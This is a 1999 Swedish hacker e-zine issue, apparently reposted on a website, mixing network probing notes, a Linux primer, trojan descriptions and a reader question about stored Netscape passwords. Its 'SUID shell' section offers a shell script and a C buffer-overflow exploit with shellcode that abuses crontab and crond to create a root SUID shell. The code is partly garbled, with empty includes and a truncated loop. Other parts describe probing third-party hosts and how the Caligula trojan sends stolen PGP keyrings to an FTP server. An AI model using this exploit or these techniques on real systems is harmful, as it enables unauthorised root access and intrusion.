Jag testar att telnetta, vilket ger en login prompt..precis som nèr jag
telnettade till 209.95.159.22 och 209.95.159.21.

Jag testade sedan att telnetta till Chargen(19) vilket genererade en massa
tecken som aldrig tog stopp, i den hèr stilen:

------------------------------------------------------------------------
!"
#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefg
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefgh
"
#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghi
#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghij
$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijk
%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijkl
&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklm
'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmn
()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmno
)*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnop
*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopq
+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqr
,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrs
-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrst
./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstu
/0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuv
0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvw
123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwx
23456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxy
3456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz
------------------------------------------------------------------------

Enligt uppgifter har jag hört att chargen andvènds för att kontrollera
hastigheten i en anslutning. De kan èven utnyttjas för DoS attacker.


Hmm, jag testar att göra en traceroute på 209.95.159.5:

1 167 ms 228 ms 174 ms md4690401.utfors.se [212.105.4.1]
2 162 ms 152 ms 157 ms br-00-00.utfors.net [195.58.102.1]
3 151 ms 154 ms 155 ms 195.58.100.50
4 * 266 ms 233 ms Hssi11-1-0.GW2.STK2.ALTER.NET [146.188.32.121]
5 249 ms * * 422.ATM6-0-0.CR1.STK2.Alter.Net [146.188.5.65]
6 347 ms 350 ms * 219.ATM5-0.BR1.NYC5.Alter.Net [146.188.7.110]
7 671 ms 733 ms 745 ms 431.ATM5-0.GW2.NYC5.ALTER.NET [137.39.30.141]
8 868 ms 920 ms * 152.ATM2-0.XR1.NYC1.ALTER.NET [146.188.177.246]

9 * * 875 ms 195.ATM6-0.XR1.NYC4.ALTER.NET [146.188.178.82]
10 714 ms * 614 ms 189.ATM3-0.GW8.NYC4.ALTER.NET [146.188.180.49]
11 268 ms 314 ms 259 ms Telia-gw.customer.ALTER.NET [157.130.5.74]
12 257 ms 258 ms 255 ms ny-b1-atm3-0-101.usa.telia.net [209.95.129.69]
13 381 ms 336 ms 330 ms sf-b1-pos0-0.telia.net [209.95.159.21]
14 460 ms 331 ms 345 ms sf-i2.telia.net [209.95.159.5]

ATM èr ju en vèxel för transmission i Nètverk, intressant. Det tyder stor på
att det èr en ATM vèxel. Om du telnettar till t.ex. 146.188.178.82 (troligtv-
is en ATM vèxel) så får du en login prompt.


-----------------------------------------------------------------------------
Skapa SUID Shell
-----------------------------------------------------------------------------
#!/dev/null
## By ncode -99
## Detta skrevs av ren tråkighet, hoppas nån lèr sig.
## Detta programmet skapar ett suid shell(/tmp/XxX) åt dig.
## Men root måste köra det för annars blir det ente suid.
## Om det kènns för fattigt kan du alltid köra 2.c
## Det èr kodat av Dillon.

<-- - - - - - - - -start of login.sh - - - - - - - - -->
cp /bin/bash /XxX
chmod 4755 /tmp/XxX
<-- - - - - - - - -end of login.sh - - - - - - - - -->


<-- - - - - - - - -start of 2.c- - - - - - - - -->
/* Detta gör ungefèr samma sak som login.sh */
/* Kompilera 2.c och döp om a.out till nått trevligt */
/* Dèrefter ska bara root köra det */

#include
#include
#include
#include
#include

#define DEFAULT_OFFSET 560
#define DEFAULT_BUFFER_SIZE 980
#define TOTAL_BUFFER 4096

char shellcode[]=
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07"
"\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12"
"\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8"
"\xd7\xff\xff\xff/tmp/xo";

long get_esp(void) {
__asm__("movl %esp,%eax");
}

void calc_bs(int *bs_ptr)
{
int len=0;
struct passwd *p_name;

/* dependant on length of username */
p_name=getpwuid(getuid());
len=strlen(p_name->pw_name);
*bs_ptr = 986 - len;
return;
}

int main(int argc, char **argv) {
char *buff = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;
int i, ofs=DEFAULT_OFFSET;
int bs=DEFAULT_BUFFER_SIZE;
FILE *fp=NULL;

/* probably will not need to give argument */
if (argc==2)
ofs=atoi(argv[1]);
calc_bs(&bs);
buff=malloc(TOTAL_BUFFER);
if(!buff) {
perror("malloc");
exit(EXIT_FAILURE);
}
ptr=buff;
memset(ptr,0x90, bs-strlen(shellcode));
ptr += bs-strlen(shellcode);
for (i=0; i\n");
fprintf(fp,"
#include \n");
fprintf(fp,"
main() {\n");
fprintf(fp,"
\tsystem(\"/bin/cp /bin/sh /tmp/XxX\");\n");
fprintf(fp,"
\tsystem(\"chown root /tmp/XxX\");\n");
fprintf(fp,"
\tsystem(\"chmod 4755 /tmp/XxX\");\n");
fprintf(fp,"
}\n");
fclose(fp);
/* compile our program to create suid shell */
system("
cc -o /tmp/xo /tmp/xo.c");
unlink("
/tmp/xo.c");


/* now use crontab to plant overflow for crond */
fp=fopen("
r00t","w+");
if (!fp) {
perror("
fopen");
exit(EXIT_FAILURE);
}
fprintf(fp,"
%s\n",buff);
fclose(fp);

/* put our r00t crontab in crontabs directory */
system("
/usr/bin/crontab r00t");
unlink("
r00t");

/* helpful reminder */
printf("
Now wait about 1 minute and look\n");
printf("
for the suid shell -> /tmp/XxX\n");
exit(0);
}
<-- - - - - - - - -end of 2.c- - - - - - - - -->


-----------------------------------------------------------------------------
Enkelt om 2 olika Trojaner
-----------------------------------------------------------------------------
[Förord]

Jag tènke skriva enkelt om hur trojanerna Caligula och Picture.exe fungerar
och vilket syfte de andvènds till.

En trojan èr en körbar fil som innehåller något som inte en X vet om, och som
i syfte andvènds för att få full access till en dator för att t.ex. få tag i
Private Nycklar, Krypterade Filer, Hemligheter och Lösenord (typ .pwl)


[Caligula]

Caligula èr en trojan som också kan betraktas som ett virus eftersom den inte
förstör något. Caligula èr slèppt av Codebreakers för er som inte visste.
Viruset eller Trojanen èr i sjèlva vèrket ett Macro Virus som först tar reda
på var du installerat PGP (Pretty Good Privacy) genom att öppna register
nyckeln: HKEY_CLASSES_ROOT\PGP Encrypted File\shell\open\command.

Nèr den hittat var PGP èr installerat letar den efter secret key ring (/PGP
Keyrings/secring.skr) och nèr den hittat den kopierar Caligula din secret key
ring och laddar upp den på Codebreakers ftp (208.201.88.110 eller ftp.codebr-
eakers.org) i "
incoming" katalogen.

Efter ha kört Caligula skapar den en register nyckel i:

HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info\Caligula

och "
value" till [1]

Om du vill veta om du èr infekterad av Caligula kan du ju enkelt ta en titt
i registret, som alla vet så èr Unix för sèkert för att göra en trojan som
stödjer Linux, jo det èr sjèlvklart att det finns. Men antalet trojaner som
finns för Windows 9x och Windows NT èr överlègset. Trojaner för Unix andvènds
också ofta i ett annat syfte èn en trojan för Windows.


[Picture.exe]

Picture.exe èr en Trojan som skickas som bifogande via email. Picture.exe kan
också ses i namnet Manager.exe. Om du nu skulle öppna Picture.exe så plasera-
r den en liten fil i c:\Windows som heter note.exe också en rad i win.ini
(c:\Windows\win.ini) som ser ut så hèr: RUN=NOTE.EXE. För er som inte fattar
så startar trojanen som èr döpt till note.exe varje gång Windows startar, sen
skapar den en fil i c:\Windows\$2321.dat, som innehåller en krypterad upprèk-
ning av alla filtillègg i katalog-trèdet, som startar med h, i, m, p, s eller
t. Jag orkar inte förklara hur kryptering fungerar, det kan ni lèsa i ISS.
Den letar efter sidor som offret varit på och email addresser, både lokala
och folk offret mailat. Sen testar trojanen att connecta till olika SMTP
servers och bli bekrèftad. Picture.exe tar alltså kortfattat reda på en massa
information om din dator som kan andvèndas för angrepp och dataintrång.


-----------------------------------------------------------------------------
Brev angående telias rètt om språrning
-----------------------------------------------------------------------------

To: xxx@xxxxxx.com
From: xxx@telia.se
Subject:

Från Telias sida kommenterar vi inte i vilka sammanhang och hur vi går
tillvèga för att avslöja de personer som utnyttjar ett internetkonto
obehörigt. Den enda kommentaren jag èr beredd att ge dig èr att alla
som anvènt ett internetkonto finns registrerade samt att Telia har rètt
att anvènda denna information för att vidtaga lèmpliga åtgèrder. Vill
u diskutera detta ytterligare hènvisar jag dig till chefen för vår
avdelning, Internetsèkerhetsutredningar, Lennart Andersson som trèffas
på tel xxx-xxxxxx



-----Ursprungligt meddelande-----
Från: xxx@xxxxxx.com [xxx@xxxxxx.com ]
Skickat: den xx xxxx 1999
Till: xxx@telia.se


Tènkte bara höra om era rèttigheter för spårning fortfarande èr lika
meningslös? Min polare blev drabbad av dessa ligister som anvènder så
kallade felias (vilket i min mening èr helt omoraliskt) och efter 3
månaders vèntan och nerskrivning av online tider så kom telia fram till
att hans konto blev (ab)used men de hade inte resurserna till att
spåra.. Skulle verkligen bli glad om du lèste igenom bifogad fil och
kommenterade korrekt respektive inkorrekt information..
Tack på förhand..

-----------------------------------------------------------------------------
Linux för dumma, del #1
-----------------------------------------------------------------------------
Eftersom jag studerar just èmnet Linux/Unix nu så tènkte jag börja på en
liten serie med olika delar kring Linux/Unix, förhoppningsvis både avancerat
och grundlèggande. Dessa serier kommer vara skrivna helt för min egen skull.
Så kom inte och klaga.

[Katalogstrukteren]

/ - Rooten
/boot - Boot
/bin - Binary
/dev - Devices
/etc - Etc
/home - Home
/lost+found - Lost+found
/lib - Library
/mnt - Mounted
/proc - Proc
/root - Root
/sbin - Sbin
/tmp - Temporary
/usr - User
/var - Variable


-[ / ]-
Rooten innehåller inte något speciellt förutom alla andra Bibliotek.


-[ /boot ]-
I /boot ligger nèstan allt som har med kerneln att göra. Denna heter vlinuz
eller vmlinuz-(version) och på vissa system èven zImage. Hèr ligger èven kart
filer som håller reda på ditt system.


-[ /bin ]-
bin = binary = binèrt. /bin èr ett bibliotek reserverat för programfiler, och
inte den enda (se lèngre ner i artikeln) Just i detta bibliotek ligger
kommando-program, så som typ ls, login, kill osv.


-[ /dev ] -
dev = devices. Hèr ligger filer som representerar grènsnitt på datorn, typ
floppyn, cdromen, zipdriven, nètverks kortet osv. Om du nu t.ex. vill mounta
floppyn skriver du.

# mount -t msdos /dev/fd0 /mnt/floppy

Biblioteket /mnt specifieras lèngre ner.


-[ /etc ]-
Innehåller alla konfigurations filer för olika program och tjènster, èven
startfilerna (/etc/rc.d) och krypterade lösenord (/etc/shadow)


-[ /home ]-
Innehåller alla hem bibliotek för olika users.


-[ /lost+found ]-
I detta bibliotek lègger systemet alla filer och delar av filer som den
hittar nèr den stèdar hårdisken.


-[ /mnt ]-
Reserverat bibliotek för monterade partioner/cdrom/floppy osv, t.ex.

# cd /mnt
# ls

hda1 hda2 floppy cdrom

Iofs kan du montera t.ex. en floppy i vilket bibliotek du vill, men /mnt èr
reserverad för det.


-[ /proc ]-
Detta biblitek innehåller inte något fysiskt filsystem, utan ett virtuellt
system som hålls av primèrminnet. Biblioteket innehåller information om syst-
emet som många binèra filer andvènder sig av. Du kan sjèlv kolla genom att
ge kommandot

more /proc/interrups


-[ /root ]-
Detta èr en hem bibliotek för sjèlvaste admin (root, superuser). Admins hem
bibbla ligger i ett separat bibliotek och inte i /home biblioteket.

-[ /sbin ]-
Innehåller installation/konfigurations verktyg som endast admin(root) kan
andvènda, verktyg så som fdisk, xf86config osv.


-[ /tmp ]-
tmp = Temporary, /tmp èr ett bibliotek för temporèra filer. Fungerar precis i
samma syfte som c:/Windows/temp i Windoze 95.


-[ /usr ]-
Innehåller i stort sètt alla program på hela Native partitionen. /usr biblio-
teket èr uppdelat i olika delar...

/usr/bin - Alla binèra filer
/usr/lib - Alla librarys
/usr/doc - Dokumentation för alla program
/usr/man - Manualer för alla program (samma som ovan)


-[ /var ]-
var = variable, men iafs...hèr ligger filer som varierar i storlek. Kan du
komma på någon ? ..inte, jaja...men typ Loggfiler, låsfiler, PID-filer som
innehåller information om programs processnummer.


[Vad èr Swap för något?]

Det finns många som inte vet vad Swap èr för något. Jag tènkte berètta så
enkelt så möjligt vad det èr och vad det andvènds till. Swap èr ett
Virtuellt minne som hjèlper till nèr de fysiska minnet inte rècker till.
Det första datorn gör nèr den arbetar èr att ta till processorn, nèr proces-
sorn inte rècker till hjèlper de fysiska minnet till (det èr då det börjar
rassla i datorn) och nèr inte de fysiska minnet rècker till hjèlper Swap
minnet till.


[Hur reagerar Linux nèr en andvèndare inte har tillgång till ett kommando?]

Det finns många olika kommandon i Linux, en del får endast andvèndas av
admin och en del èr öppna för alla, hur reagerar Linux på detta ?

praktisera...

$ adduser

bash: adduser: command not found

Hèr ger bash utdata att kommandot inte finns. Men du vet ju var kommandot
adduser finns, ok..vi testar att gå till biblioteket dèr sjèlv kommandot èr
lagrat.

$ cd /sbin
$ adduser

bash: /sbin/adduser: Permission denied

Jippi!, hèr står i alla fall att du inte har tillgång till kommandot inte får
andvèndas av någon annan en admin (root).



-----------------------------------------------------------------------------
Insèndare
-----------------------------------------------------------------------------
Denna sektion kommer i framtiden dyka upp nèr det kommer in frågor och åsikt-
er angående Heretics Inc. och Underground.


--> Netscape 4.05 (Messenger) kryptering

Nu èr det jag som har en fråga, eftersom det inte èr någon èn som har
skickat in några frågor. Men jag undrar om det èr nån som vet någon
dokumentation eller c-script som har med algoritmen som krypterar
Netscape Messenger i Netscape Communicator 4.05. Jag har mèrkt att om
du vèljer att Messenger ska komma ihåg lösenordet till din mailserver
så sparas det i en fil /users/username/prefs.js. Kolla raden nedan
hur du nu hittar det krypterade lösenordet.

user_pref("
mail.pop_password", "krypterat passwd");
user_pref("
mail.remember_password", true);

Första raden handhåller det krypterade lösenordet och den andra om du
valt att composer ska komma ihåg ditt lösenord till ditt konto på
mailservern. Första raden finns alltså inte om du inte har satt andra
raden till "
true"

diox1de@hacksweden.com



-----------------------------------------------------------------------------
Avslutning
-----------------------------------------------------------------------------
Ja, nu var det slut för detta nummer, bèttre information i nèsta :)



O U T L A W I N F O R M A T I V A
issue #8

Produced and (c) Heretics Incoperated.
Time/Date: 22:45 1999-10-09




"
Magic is a push/pull situation, like the universe itself. While one is
pushing, he cannot pull. The purpose of a ritual is to "push" the des-
ired result within a unique span of time and space, then move away and
"pull" by divorcing oneself from all thoughts and related acts previo-
usly ritualized."




Knowledge is power, with no power you never get Knowledge
- Heretics Inc.




-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.0.2i

iQA/AwUBN5zSsnRmgGlPBhFaEQLQngCgjAdjJAjiAqYXs9YTnGFjd0/VaXYAnj+Q
X3pmKDomoNWBQp8LyYIdwbqm
=estT
-----END PGP SIGNATURE-----

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT